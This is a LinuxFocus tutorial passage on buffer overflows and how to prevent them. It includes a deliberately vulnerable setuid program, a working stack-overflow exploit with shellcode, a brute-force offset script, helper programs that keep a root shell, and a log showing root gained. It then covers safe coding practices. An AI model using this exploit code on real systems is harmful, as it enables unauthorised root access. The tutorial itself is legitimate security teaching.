<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
 <META http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
 <META NAME="GENERATOR" CONTENT="lfparser_2.13">
 <META NAME="LFCATEGORY" CONTENT="Software Development">
<!-- this is used be a number of tools:
 =LF=AUTHOR:  Fr&eacute;d&eacute;ric Raynal, Christophe Blaess, Christophe Grenier
 =LF=CAT___: Software Development
 =LF=TITLE_: Avoiding security holes when developing an application - Part 3 : buffer overflows
 =LF=NUMBER: 190
 =LF=ANAME_: article190.shtml
 -->
 <TITLE>lf190, Software Development: Avoiding security holes when developing an application - Part 3 : buffer overflows</TITLE>
<!-- stylesheet added by lfparser: --> 
<style type="text/css">
<!--
 td.top {font-family: Arial,Geneva,Verdana,Helvetica,sans-serif; }
 pre { font-familiy:monospace,Courier }
 p.cl { color:#EE9500 }
 a.nodec { text-decoration:none }
 p.trans { font-size:8pt; text-align:right }
 p.clbox { width:50%; alignment:center; background-color:#FFD700; border-style:none; border-width:medium; border-color:#FFD700; padding:0.5cm ;  text-align:center }
 p.foot { background-color:#AAAAAA; color:#FFFFFF; border-style:none; border-width:medium; border-color:#AAAAAA; padding:0.5cm ; margin-top:0.1cm; margin-right:1cm; margin-left:1cm; text-align:center }
-->
</style>
 
</HEAD>
<BODY bgcolor="#ffffff" text="#000000">
 <!-- this is generated html code. NEVER use this file for your
 translation work. Instead get the file with the same article number
 and .meta.shtml in its name. Translate this meta file and then
 use lfparser program to generate the final article -->
 <!-- lfparser can be obtained from http://main.linuxfocus.org/~guido/dev/lfparser.html -->

<!-- 2pdaIgnoreStart -->

<!-- start navegation bar -->
 <!-- top navegation bar -->
 <TABLE cellspacing="0" cellpadding="0" border="0" align="center" width="90%">
   <TR bgcolor="#2e2292">
     <TD class="top"><TABLE cellspacing="0" cellpadding="0" border="0" width=
       "100%">
         <TR><TD width="144"><IMG src="../../common/images/logolftop.gif"
           alt="[LinuxFocus-icon]" width="350" height="45" align="left" 
           border="0"></TD>

           <TD class="top">
             <TABLE width="100%">
               <TR align="right">
                 <TD class="top"><A class="nodec" href="../index.shtml"><FONT color=
                 "#DDDDDD">Home</FONT></A> &nbsp;|&nbsp; <A class=
                 "nodec" href="../map.html"><FONT color=
                 "#DDDDDD">Map</FONT></A> &nbsp;|&nbsp; <A class=
                 "nodec" href="../indice.html"><FONT color=
                 "#DDDDDD">Index</FONT></A> &nbsp;|&nbsp; <A class="nodec" href="../Search/index.html"><FONT color=
                 "#DDDDDD">Search</FONT></A> </TD>
               </TR>

               <TR align="right">
                 <TD class="top">
                   <HR width="100%" noshade size="1">
                 </TD>
               </TR>
             </TABLE>
           </TD>
         </TR>
       </TABLE>
     </TD>
   </TR>
 </TABLE>
 <!-- end top navegation bar -->
 <!-- blue bar -->
 <TABLE cellspacing="0" cellpadding="0" border="0" align="center"
 width="90%">
   <TR bgcolor="#00ffff">
     <TD><IMG src="../../common/images/transpix.gif" width="1" height=
     "2" alt=""></TD>
   </TR>
 </TABLE>
 <!-- end blue bar -->
 <!-- bottom navegation bar -->
 <TABLE cellspacing="0" cellpadding="0" border="0" align="center"
 width="94%">
   <TR bgcolor="#000000">
     <TD>
       <TABLE cellspacing="0" cellpadding="1" border="0" width=
       "100%">
         <TR align="center">
           <TD class="top"><A class="nodec" href="../News/index.html"><FONT color=
           "#FFFFFF">News</FONT></A> </TD>
           <TD><FONT color="#FFFFFF">|</FONT> </TD>
           <TD><A class="nodec" href="../Archives/index.html"><FONT color=
           "#FFFFFF">Archives</FONT></A> </TD>
           <TD><FONT color="#FFFFFF">|</FONT> </TD>
           <TD><A class="nodec" href="../Links/index.html"><FONT color=
           "#FFFFFF">Links</FONT></A> </TD>
           <TD><FONT color="#FFFFFF">|</FONT> </TD>
           <TD><A class="nodec" href="../aboutus.html"><FONT color=
           "#FFFFFF">About LF</FONT></A> </TD>
           <TD>&nbsp;</TD>
         </TR>
       </TABLE>
     </TD>
   </TR>
 </TABLE>
 <!-- end bottom navegation bar -->
<!-- stop navegation bar -->

<!-- SSI_INFO -->

<!-- tr_staticssi include virtual -->
<!-- tr_staticssi exec cmd -->
<!-- addedByLfdynahead ver 1.1 --><TABLE ALIGN="right" border=0><TR><TD ALIGN="right"><FONT SIZE="-1" FACE="Arial,Helvetica">This article is available in: <A href="../../English/May2001/article190.shtml">English</a> &nbsp;<A href="../../Castellano/May2001/article190.shtml">Castellano</a> &nbsp;<A href="../../Deutsch/May2001/article190.shtml">Deutsch</a> &nbsp;<A href="../../Francais/May2001/article190.shtml">Francais</a> &nbsp;<A href="../../Nederlands/May2001/article190.shtml">Nederlands</a> &nbsp;<A href="../../Portugues/May2001/article190.shtml">Portugues</a> &nbsp;<A href="../../Russian/May2001/article190.shtml">Russian</a> &nbsp;<A href="../../Turkce/May2001/article190.shtml">Turkce</a> &nbsp;</FONT></TD></TR></TABLE><br>
 

<!-- 2pdaIgnoreStop -->

<!-- SHORT BIO ABOUT THE AUTHOR -->
<TABLE ALIGN=LEFT BORDER=0 hspace=4 vspace=4 WIDTH="30%" >
<TR>
<TD>

<!-- 2pdaIgnoreStart -->
<!-- PALM DOC -->
<TABLE BORDER=0 hspace=4 vspace=4> <TR> <TD>
<font size=1> <img src="../../common/images/2doc.gif" width=34 align=left border=0 height=22 alt="convert to palm"><a href="http://cgi.linuxfocus.org/cgi-bin/2ztxt">Convert to GutenPalm</a><br>or <a href="http://cgi.linuxfocus.org/cgi-bin/2pda">to PalmDoc</a></font>
</TD> </TR> </TABLE>
<!-- END PALM DOC -->
<!-- 2pdaIgnoreStop -->
<br>
<IMG src="../../common/images/FredCrisBCrisG.jpg" alt=
"[image of the authors]" width="200" height="150">
<BR>by  <A href= "mailto:pappy&#64;users.sourceforge.net,ccb@club-internet.fr,grenier@nef.esiea.fr"> Fr&eacute;d&eacute;ric Raynal, Christophe Blaess, Christophe Grenier</A>
<BR><BR>
<I>About the author:</I><BR>
<P>Christophe Blaess is an independent aeronautics engineer. He is a
Linux fan and does much of his work on this system. He coordinates the
translation of the man pages as published by the <I>Linux Documentation
Project</I>.</P><P>Christophe Grenier is a 5th year student at the ESIEA, where he
also works as a sysadmin. He has a passion for computer security.</P><p>Frederic Raynal has been using Linux for several years
because it doesn't pollute, use hormones, MSG or
animal bone-meal... only sweat and cunning.</p>
<BR><i>Content</i>:
<UL>
  <LI><A HREF="#190lfindex0">Buffer overflows</A></LI>
  <LI><A HREF="#190lfindex1">Position in memory</A></LI>
  <LI><A HREF="#190lfindex2">Launch program</A></LI>
  <LI><A HREF="#190lfindex3">shell(s) problems</A></LI>
  <LI><A HREF="#190lfindex4">Prevention</A></LI>
  <LI><A HREF="#190lfindex5">Checking indexes</A></LI>
  <LI><A HREF="#190lfindex6">Using n functions</A></LI>
  <LI><A HREF="#190lfindex7">Validating the data in two steps</A></LI>
  <LI><A HREF="#190lfindex8">Using dynamic buffers</A></LI>
  <LI><A HREF="#190lfindex9">Conclusion</A></LI>
  <LI><A HREF="#190lfindex10">Links</A></LI>
  <LI><A HREF="http://cgi.linuxfocus.org/cgi-bin/lftalkback?anum=190&lang=en">Talkback form for this article</A></LI>
</UL>

</TD></TR></TABLE>
<!-- HEAD OF THE ARTICLE -->
<br>&nbsp;
<H2>Avoiding security holes when developing an application - Part 3 : buffer overflows</H2>
 <IMG src="../../common/images/illustration183.gif" width="100" height=
"100" alt="[article illustration]" hspace="10">
<!-- ABSTRACT OF THE ARTICLE -->
<P><i>Abstract</i>:
<P>


In this article we introduce a real buffer overflow in an application.
We'll show that it's an easily exploitable
security hole and how to avoid it.
This article assumes that you have read the 2 previous articles:
<ul><li><a href="../January2001/article182.shtml">Avoiding security holes when developing an application - Part 1</a><li><a href="../March2001/article183.shtml">Avoiding security holes when developing an application - Part 2: memory, stack and functions, shellcode</a></ul></P>
<HR size="2" noshade align="right"><BR>
<!-- BODY OF THE ARTICLE -->


<A NAME="190lfindex0">&nbsp;</A>
<H3>Buffer overflows</H3>



<P>In our previous article we wrote a small program of about 50 bytes
and we were able to start a shell or exit in case of failure. Now we must
insert this code into the application we want to attack. This is done
by overwriting the return address of a function and replace it with our
shellcode address. You do this by forcing the overflow of an automatic
variable allocated in the process stack.</P>

<P>For example, in the following program, we copy the string given as
first argument in the command line to a 500 byte buffer. This copy is
done without checking if it's larger than the buffer size. As we'll see
later on, using the <CODE>strncpy()</CODE> function allows us to avoid
this problem.</P>

<PRE>
  /* vulnerable.c */

  #include &lt;string.h&gt;

  int main(int argc, char * argv [])
  {
    char buffer [500];

    if (argc &gt; 1)
    strcpy(buffer, argv[1]);
    return (0);
  }
</PRE>

<P><CODE>buffer</CODE> is an automatic variable, the space used by the
500&nbsp;bytes is reserved in the stack as soon as we enter the
<CODE>main()</CODE> function. When running the <CODE>vulnerable</CODE>
program with an argument longer than 500 characters, the data overflows
the buffer and "invades" the process stack. As we've seen before, the
stack holds the address of the next instruction to be executed (aka
<EM>return address</EM>). To exploit this security hole, it is enough to
replace the return address of the function with the shellcode address
we want to execute. This shellcode is inserted into the body buffer,
followed by its address in memory.</P>

<A NAME="190lfindex1">&nbsp;</A>
<H2>Position in memory</H2>



<P>Getting the memory address of the shellcode is rather tricky. We
must discover the offset between the <CODE>%esp</CODE> register
pointing to the top of the stack and the shellcode address. To benefit
from a margin of safety, the beginning of the buffer is filled up with
the <CODE>NOP</CODE> assembly instruction; it's a one byte neutral
instruction having no effect at all. Thus, when the starting address
points before the true beginning of the shellcode, the CPU goes from
<CODE>NOP</CODE> to <CODE>NOP</CODE> till it reaches our code. To get
more chance, we put the shellcode in the middle of the buffer, followed
by the starting address repeated till the end, and preceded by a
<CODE>NOP</CODE> block. The <A href="#buffer">diagram 1</A> illustrates
this:</P>


<CENTER>
<TABLE width="90%" nosave="">
<CAPTION align="BOTTOM"><A name="buffer" href="#buffer">Diag. 1</A> :
buffer especially filled up for the exploit.</CAPTION>

<TR>
<TD><IMG src="../../common/images/article190/art_03_01.gif" alt=
"[buffer]"></TD>
</TR>
</TABLE>
</CENTER>

<BR>
<BR>
<P><A href="#aligne">Diagram 2</A> describes the state of the stack
before and after the overflow. It causes all the saved information
(saved <CODE>%ebp</CODE>, saved <CODE>%eip</CODE>, arguments,...) to be
replaced with the new expected return address: the start address
of the part of the buffer where we put the shellcode.
</P>

<CENTER>
<TABLE width="80%" border="2" cols="2" nosave="">
<CAPTION align="BOTTOM"><A name="avt_apr" href="#avt_apr">Diag. 2</A> :
state of the stack before and after the overflow</CAPTION>

<TR>
<TD>
<CENTER><IMG src="../../common/images/article190/pile_bef.gif" alt=
"pile_bef.gif"></CENTER>
</TD>
<TD>
<CENTER><IMG src="../../common/images/article190/pile_aft.gif" alt=
"pile_aft.gif"></CENTER>
</TD>
</TR>

<TR>
<TD>
<CENTER>Before</CENTER>
</TD>
<TD>
<CENTER>After</CENTER>
</TD>
</TR>
</TABLE>
</CENTER>

<BR>
<BR>
<P>However, there is another problem related to variable alignment
within the stack. An address is longer than 1 byte and is therefore stored in several  bytes and this may cause the
alignment within the stack to not always fit exactly right.
Trial and error finds the right alignment. Since our
CPU uses 4 bytes words, the alignment is 0, 1, 2 or 3 bytes (check <A
href="../March2001/article183.shtml">Part 2 = article 183</A> about stack
organization). In <A href="#aligne">diagram 3</A>, the grayed parts
correspond to the written 4 bytes. The first case where the return
address is overwritten completely with the right alignment is the only one that will work. The others lead to
<CODE>segmentation violation</CODE> or <CODE>illegal instruction</CODE>
errors. This empirical way to search works fine since todays computer
power allows us to do this kind of testing.</P>

<CENTER>
<TABLE width="90%" nosave="">
<CAPTION align="BOTTOM"><A name="aligne" href="#aligne">Diag. 3</A> :
possible alignment with 4 bytes words</CAPTION>

<TR>
<TD><IMG src="../../common/images/article190/align-en.png" alt=
"[align]"></TD>
</TR>
</TABLE>
</CENTER>

<A NAME="190lfindex2">&nbsp;</A>
<H2>Launch program</H2>



<P>We are going to write a small program to launch a vulnerable
application by writing data  which will overflow the stack. This program
has various options to position the shellcode position in memory and so choose
which program to run. This version, inspired by Aleph One article from
<EM>phrack</EM> magazine issue 49, is available from Christophe Grenier's
website.</P>

<P>How do we send our prepared buffer to the target application ?
Usually, you can use a command line parameter like the one in
<CODE>vulnerable.c</CODE> or an environment variable. The overflow
can also be caused by typing in the data or just reading it from a file.</P>

<P>The <CODE>generic_exploit.c</CODE> program starts allocating the
right buffer size , next it copies the shellcode there and fills it up
with the addresses and the NOP codes as explained above. It then
prepares an argument array and runs the target application using the
<CODE>execve()</CODE> instruction, this last replacing the current
process with the invoked one. The <CODE>generic_exploit</CODE> program
needs to know
the buffer size to exploit (a bit bigger than its size
to be able to overwrite the return addresss), the memory offset and the
alignment. We indicate if the buffer is passed either as an environment
variable (<CODE>var</CODE>) or from the command line
(<CODE>novar</CODE>). The <CODE>force/noforce</CODE> argument determines if
the call runs the <CODE>setuid()/setgid()</CODE> function
from the shellcode.</P>

<PRE>
<small>
/* generic_exploit.c */

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/stat.h&gt;
#define NOP                     0x90

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\xff\x31\xc0\x88\x46\xff\x89\x46\xff\xb0\x0b"
        "\x89\xf3\x8d\x4e\xff\x8d\x56\xff\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff";

unsigned long get_sp(void)
{
   __asm__("movl %esp,%eax");
}

#define A_BSIZE     1
#define A_OFFSET    2
#define A_ALIGN     3
#define A_VAR       4
#define A_FORCE     5
#define A_PROG2RUN  6
#define A_TARGET    7
#define A_ARG       8

int main(int argc, char *argv[])
{
   char *buff, *ptr;
   char **args;
   long addr;
   int offset, bsize;
   int i,j,n;
   struct stat stat_struct;
   int align;
   if(argc &lt; A_ARG)
   {
      printf("USAGE: %s bsize offset align (var / novar)
             (force/noforce) prog2run target param\n", argv[0]);
      return -1;
   }
   if(stat(argv[A_TARGET],&amp;stat_struct))
   {
     printf("\nCannot stat %s\n", argv[A_TARGET]);
     return 1;
   }
   bsize  = atoi(argv[A_BSIZE]);
   offset = atoi(argv[A_OFFSET]);
   align  = atoi(argv[A_ALIGN]);

   if(!(buff = malloc(bsize)))
   {
      printf("Can't allocate memory.\n");
      exit(0);
   }

   addr = get_sp() + offset;
   printf("bsize %d, offset %d\n", bsize, offset);
   printf("Using address: 0lx%lx\n", addr);

   for(i = 0; i &lt; bsize; i+=4) *(long*)(&amp;buff[i]+align) = addr;

   for(i = 0; i &lt; bsize/2; i++) buff[i] = NOP;

   ptr = buff + ((bsize/2) - strlen(shellcode) - strlen(argv[4]));
   if(strcmp(argv[A_FORCE],"force")==0)
   {
     if(S_ISUID&amp;stat_struct.st_mode)
     {
       printf("uid %d\n", stat_struct.st_uid);
       *(ptr++)= 0x31;          /* xorl %eax,%eax   */
       *(ptr++)= 0xc0;
       *(ptr++)= 0x31;          /* xorl %ebx,%ebx   */
       *(ptr++)= 0xdb;
       if(stat_struct.st_uid &amp; 0xFF)
       {
     *(ptr++)= 0xb3;        /* movb $0x??,%bl   */
     *(ptr++)= stat_struct.st_uid;
       }
       if(stat_struct.st_uid &amp; 0xFF00)
       {
     *(ptr++)= 0xb7;        /* movb $0x??,%bh   */
     *(ptr++)= stat_struct.st_uid;
       }
       *(ptr++)= 0xb0;          /* movb $0x17,%al   */
       *(ptr++)= 0x17;
       *(ptr++)= 0xcd;          /* int $0x80        */
       *(ptr++)= 0x80;
     }
     if(S_ISGID&amp;stat_struct.st_mode)
     {
       printf("gid %d\n", stat_struct.st_gid);
       *(ptr++)= 0x31;          /* xorl %eax,%eax   */
       *(ptr++)= 0xc0;
       *(ptr++)= 0x31;          /* xorl %ebx,%ebx   */
       *(ptr++)= 0xdb;
       if(stat_struct.st_gid &amp; 0xFF)
       {
     *(ptr++)= 0xb3;        /* movb $0x??,%bl   */
     *(ptr++)= stat_struct.st_gid;
       }
       if(stat_struct.st_gid &amp; 0xFF00)
       {
     *(ptr++)= 0xb7;        /* movb $0x??,%bh   */
     *(ptr++)= stat_struct.st_gid;
       }
       *(ptr++)= 0xb0;          /* movb $0x2e,%al   */
       *(ptr++)= 0x2e;
       *(ptr++)= 0xcd;          /* int $0x80        */
       *(ptr++)= 0x80;
     }
   }
   /* Patch shellcode */
   n=strlen(argv[A_PROG2RUN]);
   shellcode[13] = shellcode[23] = n + 5;
   shellcode[5] = shellcode[20] = n + 1;
   shellcode[10] = n;
   for(i = 0; i &lt; strlen(shellcode); i++) *(ptr++) = shellcode[i];
   /* Copy prog2run */
   printf("Shellcode will start %s\n", argv[A_PROG2RUN]);
   memcpy(ptr,argv[A_PROG2RUN],strlen(argv[A_PROG2RUN]));

   buff[bsize - 1] = '\0';

   args = (char**)malloc(sizeof(char*) * (argc - A_TARGET + 3));
   j=0;
   for(i = A_TARGET; i &lt; argc; i++)
     args[j++] = argv[i];
   if(strcmp(argv[A_VAR],"novar")==0)
   {
     args[j++]=buff;
     args[j++]=NULL;
     return execve(args[0],args,NULL);
   }
   else
   {
     setenv(argv[A_VAR],buff,1);
     args[j++]=NULL;
     return execv(args[0],args);
   }
}
</small>
</PRE>

<P>To benefit from <CODE>vulnerable.c</CODE>, we must have a buffer
bigger than the one expected by the application. For instance, we select
600 bytes instead of the 500 expected. We find the offset related to
the top of the stack by successive tests. The address built
with the <CODE>addr = get_sp() + offset;</CODE> instruction is used to
overwrite the return address, you get it ... with a bit of luck ! The
operation relies on the heurism that the <CODE>%esp</CODE> register
won't move too much during the current process and the one called at
the end of the program. Practically, nothing is certain : various
events might modify the stack state from the time of the computation
 to the time the program to exploit is called. Here, we succeeded
in activating an exploitable overflow with a -1900 bytes offset. Of
course, to complete the experience, the <CODE>vulnerable</CODE> target
must be Set-UID <EM>root</EM>.</P>

<PRE>
  $ cc vulnerable.c -o vulnerable
  $ cc generic_exploit.c -o generic_exploit
  $ su
  Password:
  # chown root.root vulnerable
  # chmod u+s vulnerable
  # exit
  $ ls -l vulnerable
  -rws--x--x   1 root     root        11732 Dec  5 15:50 vulnerable
  $ ./generic_exploit 600 -1900 0 novar noforce /bin/sh ./vulnerable
  bsize 600, offset -1900
  Using address: 0lxbffffe54
  Shellcode will start /bin/sh
  bash# id
  uid=1000(raynal) gid=100(users) euid=0(root) groups=100(users)
  bash# exit
  $ ./generic_exploit 600 -1900 0 novar force /bin/sh /tmp/vulnerable
  bsize 600, offset -1900
  Using address: 0lxbffffe64
  uid 0
  Shellcode will start /bin/sh
  bash# id
  uid=0(root) gid=100(users) groups=100(users)
  bash# exit
</PRE>

In the first case (<CODE>noforce</CODE>), our <CODE>uid</CODE> doesn't
change. Nevertheless we have a new <CODE>euid</CODE> providing us with
all the rights. Thus, even if <CODE>vi</CODE> says while
editing
<CODE>/etc/passwd</CODE> that it is read only we can still write the file
and all the changes will work :
you just have to force
the writing with <CODE>w!</CODE> :) The <CODE>force</CODE> parameter
allows <CODE>uid=euid=0</CODE> from start.

<P>To automatically find offset values for an overflow we can
use the following small shell script:</P>

<PRE>
 #! /bin/sh
 # find_exploit.sh
  BUFFER=600
  OFFSET=$BUFFER
  OFFSET_MAX=2000
  while [ $OFFSET -lt $OFFSET_MAX ] ; do
    echo "Offset = $OFFSET"
    ./generic_exploit $BUFFER $OFFSET 0 novar force /bin/sh ./vulnerable
    OFFSET=$(($OFFSET + 4))
  done
</PRE>

In our exploit we didn't take into account the potential alignment
problems. Then, it's possible that this example doesn't work for you
with the same values, or doesn't work at all because of the alignment.
(For those wanting to test anyway, the alignment parameter has to be
changed to 1, 2 or 3 (here, 0). Some systems don't accept writing in
memory areas not being a whole word, but this is not true for Linux.

<A NAME="190lfindex3">&nbsp;</A>
<H2>shell(s) problems</H2>



<P>Unfortunately, sometimes the obtained shell is unusable since it
ends on its own or when pressing a key. We use another program
to keep privileges that we so carefully acquired:</P>

<PRE>
/* set_run_shell.c */
#include &lt;unistd.h&gt;
#include &lt;sys/stat.h&gt;

int main()
{
  chown ("/tmp/run_shell", geteuid(), getegid());
  chmod ("/tmp/run_shell", 06755);
  return 0;
}
</PRE>

<P>Since our exploit is only able to do one task at a time, we are
going to transfer the rights gained from the <CODE>run_shell</CODE>
program with the help of the <CODE>set_run_shell</CODE> program. We'll
then get the desired shell.</P>

<PRE>
/* run_shell.c */
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;

int main()
{
  setuid(geteuid());
  setgid(getegid());
  execl("/tmp/shell","shell","-i",0);
  exit (0);
}
</PRE>

The <CODE>-i</CODE> option corresponds to <CODE>interactive</CODE>. Why
not giving the rights directly to a shell ? Just because the
<CODE>s</CODE> bit is not available for every shell. The recent
versions check that uid is equal to euid, same for gid and egid. Thus
<CODE>bash2</CODE> and <CODE>tcsh</CODE> incorporate this defense line,
but neither <CODE>bash</CODE>, nor <CODE>ash</CODE> have it. This
method must be refined when the partition on which
<CODE>run_shell</CODE> is located (here, <CODE>/tmp</CODE>) is mounted
<CODE>nosuid</CODE> or <CODE>noexec</CODE>.

<A NAME="190lfindex4">&nbsp;</A>
<H2>Prevention</H2>



<P>Since we have a Set-UID program with a buffer overflow bug and its
source code, we are able to prepare an attack allowing execution of
arbitrary code under the ID of the file owner. However, our goal is to
avoid security holes. Now we are going to examine a few rules to
prevent buffer overflows.</P>

<A NAME="190lfindex5">&nbsp;</A>
<H2>Checking indexes</H2>



<P>The first rule to follow is just a matter of good sense : the
indexes used to manipulate an array must always be checked carefully. A
"clumsy" loop like :</P>

<PRE>
  for (i = 0; i &lt;= n; i ++) {
    table [i] = ...
</PRE>

probably holds an error because of the <CODE>&lt;=</CODE> sign instead
of <CODE>&lt;</CODE> since an access is done beyond the end of the
array. If it's easy to see in that loop, it's more difficult
with a loop using decreasing indexes since you must ensure that you are not going
below zero. Apart from the <CODE>for(i=0; i&lt;n ; i++)</CODE> trivial
case, you must check the algorithm several times (or even ask someone else to check for
you), especially when the index is modified inside the loop.

<P>The same type of problem is found with strings : you must always
remember to add one more byte for the final null character.
One of the newbie's most frequent mistakes lies in forgetting the string terminator.
Worse, it's hard
to diagnose since unpredictable variable alignments (e.g. compiling with
debug information) can hide the problem.</P>

<P>Don't underestimate array indexes as a threat to application
security. We have seen (check <EM>Phrack</EM> issue 55)
that only a one byte overflow is enough to create a security hole,
inserting the shellcode into an environment variable, for instance.</P>

<PRE>
  #define BUFFER_SIZE 128

  void foo(void) {

    char buffer[BUFFER_SIZE+1];

    /* end of string */
    buffer[BUFFER_SIZE] = '\0';

    for (i = 0; i&lt;BUFFER_SIZE; i++)
      buffer[i] = ...
  }
</PRE>

<A NAME="190lfindex6">&nbsp;</A>
<H2>Using n functions</H2>



As a convention, standard C library functions are aware of the end of
the string because of a null byte. For example, the
<CODE>strcpy(3)</CODE> function copies the
original string content
into a destination string until it reaches this null byte. In some cases,
this behavior becomes dangerous; we have seen the following code contains
a security hole :

<PRE>
  #define LG_IDENT 128

  int fonction (const char * name)
  {
    char identity [LG_IDENT];
    strcpy (identity, name);
    ...
  }
</PRE>

Functions that limit the copy length avoid this problem
These functions have an `<CODE>n</CODE>' in the middle of their name,
for instance <CODE>strncpy(3)</CODE> as a replacement for
<CODE>strcpy(3)</CODE>, <CODE>strncat(3)</CODE> for
<CODE>strcat(3)</CODE> or even <CODE>strnlen(3)</CODE> for
<CODE>strlen(3)</CODE>.

<P>However, you must be careful with the <CODE>strncpy(3)</CODE>
limitation since it generates edge effects : when the source string is
shorter than the destination one, the copy will be completed with null
characters till the <EM>n</EM> limit and makes the application less
performant. On the other hand, if the source string is longer, it will be
truncated and the copy will then not end
with a null character. Then you must add it manually. Taking
this into account, the previous routine becomes :</P>

<PRE>
  #define LG_IDENT 128

  int fonction (const char * name)
  {
    char identity [LG_IDENT+1];
    strncpy (identity, name, LG_IDENT);
    identity [LG_IDENT] = '\0';
    ...
  }
</PRE>

Of course, the same principles apply to routines manipulating wide
characters (more than 8 bit), for instance <CODE>wcsncpy(3)</CODE> should be prefered to
<CODE>wcscpy(3)</CODE> or <CODE>wcsncat(3)</CODE> to
<CODE>wcscat(3)</CODE>. Sure, the program gets bigger but the security
improves, too.

<P>Like <CODE>strcpy()</CODE>, <CODE>strcat(3)</CODE> doesn't check
buffer size. The <CODE>strncat(3)</CODE> function adds a character at
the end of the string if it finds the room to do it. Replacing
<CODE>strcat(buffer1, buffer2);</CODE> with <CODE>strncat(buffer1,
buffer2, sizeof(buffer1)-1);</CODE> eliminates the
risk.</P>

<P>The <CODE>sprintf()</CODE> function allows to copy formatted data
into a string. It also has a version which can check the number of
bytes to copy : <CODE>snprintf()</CODE>. This function returns the
number of characters written into the destination string (without
taking into account the `\0'). Testing this return value tells you
if the writing has been done properly :</P>

<PRE>
  if (snprintf(dst, sizeof(dst) - 1, "%s", src) &gt; sizeof(dst) - 1) {
    /* Overflow */
    ...
  }
</PRE>

<P>Obviously, this is not worth it anymore as soon as the user gets the
control of the number of bytes to copy. Such a hole in BIND (Berkeley
Internet Name Daemon) made a lot of crackers busy :</P>

<PRE>
  struct hosten *hp;
  unsigned long address;

  ...

  /* copy of an address */
  memcpy(&amp;address, hp-&gt;h_addr_list[0], hp-&gt;h_length);
  ...

</PRE>

This should always copy 4 bytes. Nevertheless, if you can change
<CODE>hp-&gt;h_length</CODE>, then you are able to modify the stack.
Accordingly, it's compulsory to check the data length before copying :

<PRE>
  struct hosten *hp;
  unsigned long address;

  ...

  /* test */
  if (hp-&gt;h_length &gt; sizeof(address))
    return 0;

  /* copy of an address */
  memcpy(&amp;address, hp-&gt;h_addr_list[0], hp-&gt;h_length);
  ...
</PRE>

In some circumstances it's impossible to truncate that way (path,
hostname, URL...) and things have to be done earlier in the program as
soon as data is typed.

<A NAME="190lfindex7">&nbsp;</A>
<H2>Validating the data in two steps</H2>



A program running with privileges other than those of its user implies
that you protect all data and that
you consider all incoming data suspicious.

<P>First of all, this concerns string input routines. According to
what we just said, we won't insist that you <EM>never</EM>
use <CODE>gets(char *array)</CODE> since the string length is not
checked (authors note : this routine should be forbidden by the link
editor for new compiled programs). More insidious risks are hiden in
<CODE>scanf()</CODE>. The line</P>

<PRE>
scanf ("%s", string)
</PRE>

is as dangerous as <CODE>gets(char *array)</CODE>, but it
isn't so obvious. But functions from the <CODE>scanf()</CODE>
family offer a control mechanism on the data size :

<PRE>
  char buffer[256];
  scanf("%255s", buffer);
</PRE>

This formatting limits  the number of characters copied into
<CODE>buffer</CODE> to 255. On the other hand, <CODE>scanf()</CODE> puts
the characters it doesn't like back into the incoming stream so
the risks of programming
errors generating locks are rather high.

<P>Using C++, the <CODE>cin</CODE> stream replaces the classical functions
used in C (even if you can still use them). The following program fills
a buffer :</P>

<PRE>
  char buffer[500];
  cin&gt;&gt;buffer;
</PRE>

As you can see, it does no tests ! We are in a situation similar to
<CODE>gets(char *array)</CODE> while using C : a door is wide open.
The <CODE>ios::width()</CODE> member function allows to fix the maximum
number of characters to read.

<P>The reading of data requires two steps. A first phase consists of
getting the string with <CODE>fgets(char *array, int size, FILE
stream)</CODE>, it limits the size of the used memory area. Next, the
read data is formatted, through <CODE>sscanf()</CODE> for example. The
first phase can do more, such as inserting <CODE>fgets(char *array,
int size, FILE stream)</CODE> into a loop automatically allocating
the required memory, without arbitrary limits. The Gnu extension
<CODE>getline()</CODE> can do that for you. It's also possible to
include typed characters validation using <CODE>isalnum()</CODE>,
<CODE>isprint()</CODE>, etc. The <CODE>strspn()</CODE> function allows
effective filtering. The program becomes a bit slower, but the code
sensitive parts are protected from illegal
data with a bulletproof jacket.</P>

<P>Direct data typing is not the only attackable entry point. The
software's data files are vulnerable, but the code written to read them
is usually stronger than the one for console input since programmers intuitively
don't trust file content provided by the user.</P>

<P>The buffer overflow attacks often lean on something else :
environment strings. We must not forget a programmer can fully
configure a process environment before launching it. The convention
saying an environment string must be of the "<CODE>NAME=VALUE</CODE>"
type can be exploited by an ill-intentioned user. Using the
<CODE>getenv()</CODE> routine requires some caution, especially when
it's about return string length (arbitrarily long) and its content
(where you can find any character, `<CODE>=</CODE>' included). The
string returned by <CODE>getenv()</CODE> will be treated like the one
provided by <CODE>fgets(char *array, int size, FILE stream)</CODE>,
taking care of its length and validating it one character after the
other.</P>

<P>Using such filters is done like accessing a computer : default is to
forbid everything ! Next, you can allow a few things :</P>

<PRE>
  #define GOOD "abcdefghijklmnopqrstuvwxyz\
                BCDEFGHIJKLMNOPQRSTUVWXYZ\
                1234567890_"

  char *my_getenv(char *var) {
    char *data, *ptr

    /* Getting the data */
    data = getenv(var);

    /* Filtering
       Rem : obviously the replacement character must be
             in the list of the allowed ones !!!
    */
    for (ptr = data; *(ptr += strspn(ptr, GOOD));)
      *ptr = '_';

    return data;
  }
</PRE>

<P>The <CODE>strspn()</CODE> function makes it easy : it looks for the
first character not part of the good character set. It returns the string
length (starting from 0) only holding valid characters. You must never
reverse the logic. Don't validate  against characters that you don't want.
Always check against the "good" characters.
</P>

<A NAME="190lfindex8">&nbsp;</A>
<H2>Using dynamic buffers</H2>



<P>Buffer overflow relies on the stack content overwriting a variable and changing
the return address of a function. The attack involves automatic data, which
only allocated in the stack. A way to move the problem is to replace
the characters tables allocated in the stack with dynamic variables
found in the <EM>heap</EM>. To do this we replace the sequence</P>

<PRE>
  #define LG_STRING    128
  int fonction (...)
  {
    char array [LG_STRING];
    ...
    return (result);
  }
</PRE>

with :

<PRE>
  #define LG_STRING    128
  int fonction (...)
  {
    char *string = NULL;
    if ((string = malloc (LG_STRING)) == NULL)
        return (-1);
    memset(string,'\0',LG_STRING);
    [...]
    free (string);
